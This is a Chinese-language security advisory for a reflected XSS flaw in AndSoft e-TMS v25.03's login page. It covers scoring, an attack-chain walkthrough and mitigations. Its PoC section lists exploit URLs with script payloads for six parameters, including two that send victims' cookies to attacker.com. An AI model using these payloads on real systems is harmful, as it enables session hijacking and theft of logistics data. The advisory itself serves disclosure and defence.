CVE-2025-59774：AndSoft e-TMS 反射型跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2025-59774

漏洞类型

反射型跨站脚本（Reflected XSS）

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

AndSoft e-TMS

漏洞概述

CVE-2025-59774 是 AndSoft 公司开发的 e-TMS（电子运输管理系统）v25.03 版本中存在的一个反射型跨站脚本（Reflected XSS）漏洞。该漏洞由西班牙国家网络安全研究所（INCIBE）于2025年10月2日披露，CVSS 3.1 评分为 6.1 分，属于中等严重等级。

AndSoft e-TMS 是一款广泛应用于物流和运输行业的运输管理系统，用于管理运输订单、车辆调度、物流跟踪等业务。由于该系统在企业物流运营中的核心地位，其安全性直接影响企业的业务连续性和数据安全。

该漏洞存在于系统的登录页面路径 '/clt/LOGINFRM_VON.ASP' 中，具体涉及 'l'、'demo'、'demo2'、'TNTLOGIN'、'UO' 和 'SuppConn' 等多个参数。攻击者可以通过构造包含恶意 JavaScript 代码的特殊 URL，诱使受害者点击该链接，从而在受害者的浏览器环境中执行任意 JavaScript 代码。由于漏洞为反射型，恶意脚本不会持久存储在服务器端，而是通过 URL 参数即时反射到响应页面中执行。

该漏洞的成功利用可能带来多种安全风险，包括窃取用户会话凭证（如 Cookie）、劫持用户会话、进行钓鱼攻击、篡改页面内容、重定向用户到恶意网站，以及在特定条件下利用浏览器漏洞进行进一步攻击等。由于 e-TMS 系统通常存储敏感的运输和物流数据，XSS 漏洞可能被用作更复杂攻击链的第一步。

技术细节

该漏洞属于典型的反射型 XSS（Cross-Site Scripting）漏洞，其根本原因在于 e-TMS v25.03 版本的登录页面 '/clt/LOGINFRM_VON.ASP' 对用户输入的参数缺乏充分的过滤和编码处理。

具体而言，当用户访问包含恶意参数的 URL 时，服务器会将这些未经净化的参数值直接嵌入到返回的 HTML 页面中。受影响的参数包括 'l'、'demo'、'demo2'、'TNTLOGIN'、'UO' 和 'SuppConn'。攻击者可以在这些参数中注入任意的 HTML 和 JavaScript 代码，例如 <script> 标签或事件处理器（如 onerror、onload 等）。

利用方式如下：攻击者首先构造一个特殊的 URL，其中包含恶意 JavaScript 代码作为参数值。然后通过电子邮件、即时消息或其他社交工程手段将该 URL 发送给目标用户。当受害者在已登录或访问 e-TMS 系统的浏览器中点击该链接时，服务器会将恶意代码作为正常响应的一部分返回，并在受害者的浏览器中执行。

由于 CVSS 向量显示该漏洞需要用户交互（UI:R）且影响范围为变更型（S:C），意味着虽然漏洞利用需要受害者点击恶意链接，但一旦成功，攻击范围可以扩大到受影响的组件范围。由于无需认证（PR:N）且攻击复杂度低（AC:L），使得该漏洞更容易被利用。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过 Shodan、Censys 等搜索引擎或直接探测，识别目标组织使用的 AndSoft e-TMS v25.03 系统实例，并确认其登录页面 '/clt/LOGINFRM_VON.ASP' 的可访问性。

STEP 2

步骤2：漏洞验证

攻击者向目标系统的登录页面发送包含测试 payload 的请求，验证 'l'、'demo'、'demo2'、'TNTLOGIN'、'UO' 和 'SuppConn' 参数是否存在 XSS 漏洞，确认哪些参数未经过滤直接输出到页面中。

STEP 3

步骤3：构造恶意 URL

攻击者根据验证结果，构造包含恶意 JavaScript 代码的 URL。代码可能用于窃取 Cookie、会话令牌，或执行其他恶意操作如重定向、键盘记录等。

STEP 4

步骤4：社工投递

攻击者通过钓鱼邮件、即时消息、社交媒体等渠道将恶意 URL 发送给目标用户，利用社会工程学手段诱使受害者点击链接。

STEP 5

步骤5：恶意代码执行

受害者在浏览器中点击恶意链接后，服务器将包含恶意脚本的页面返回，浏览器解析并执行其中的 JavaScript 代码，攻击者的恶意载荷在受害者会话中生效。

STEP 6

步骤6：数据窃取与权限提升

攻击者通过执行的 JavaScript 代码窃取用户的会话 Cookie、会话令牌或其他敏感信息，利用窃取的凭证冒充合法用户访问系统，进一步渗透内网或获取敏感物流数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-59774 - AndSoft e-TMS Reflected XSS PoC -->
<!-- Vulnerable endpoint: /clt/LOGINFRM_VON.ASP -->
<!-- Vulnerable parameters: l, demo, demo2, TNTLOGIN, UO, SuppConn -->

<!-- Exploit URL examples: -->

<!-- Using 'l' parameter -->
https://target/clt/LOGINFRM_VON.ASP?l=<script>alert('XSS-CVE-2025-59774')</script>

<!-- Using 'demo' parameter -->
https://target/clt/LOGINFRM_VON.ASP?demo=<script>alert(document.cookie)</script>

<!-- Using 'demo2' parameter -->
https://target/clt/LOGINFRM_VON.ASP?demo2=<img src=x onerror=alert('XSS')>

<!-- Using 'TNTLOGIN' parameter -->
https://target/clt/LOGINFRM_VON.ASP?TNTLOGIN=<svg onload=alert(document.domain)>

<!-- Using 'UO' parameter -->
https://target/clt/LOGINFRM_VON.ASP?UO=<body onload=alert('XSS-CVE-2025-59774')>

<!-- Using 'SuppConn' parameter -->
https://target/clt/LOGINFRM_VON.ASP?SuppConn=<script>fetch('http://attacker.com/steal?c='+document.cookie)</script>

<!-- Cookie stealing payload example -->
https://target/clt/LOGINFRM_VON.ASP?l=<script>new Image().src="http://attacker.com/steal?cookie="+document.cookie;</script>

影响范围

AndSoft e-TMS v25.03

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）对 '/clt/LOGINFRM_VON.ASP' 页面实施访问控制，限制仅授权用户可访问；2）在 Web 服务器或反向代理层面部署 XSS 过滤规则，对请求参数中的可疑字符进行过滤；3）配置 Web 应用防火墙（WAF）规则，检测和拦截常见的 XSS 攻击向量；4）为所有 Cookie 设置 HTTPOnly 标志，降低会话劫持风险；5）实施 Content Security Policy（CSP），限制脚本执行来源；6）加强用户安全意识培训，提醒用户不要点击来源不明的链接；7）监控异常的网络流量和用户行为，及时发现潜在的 XSS 攻击尝试。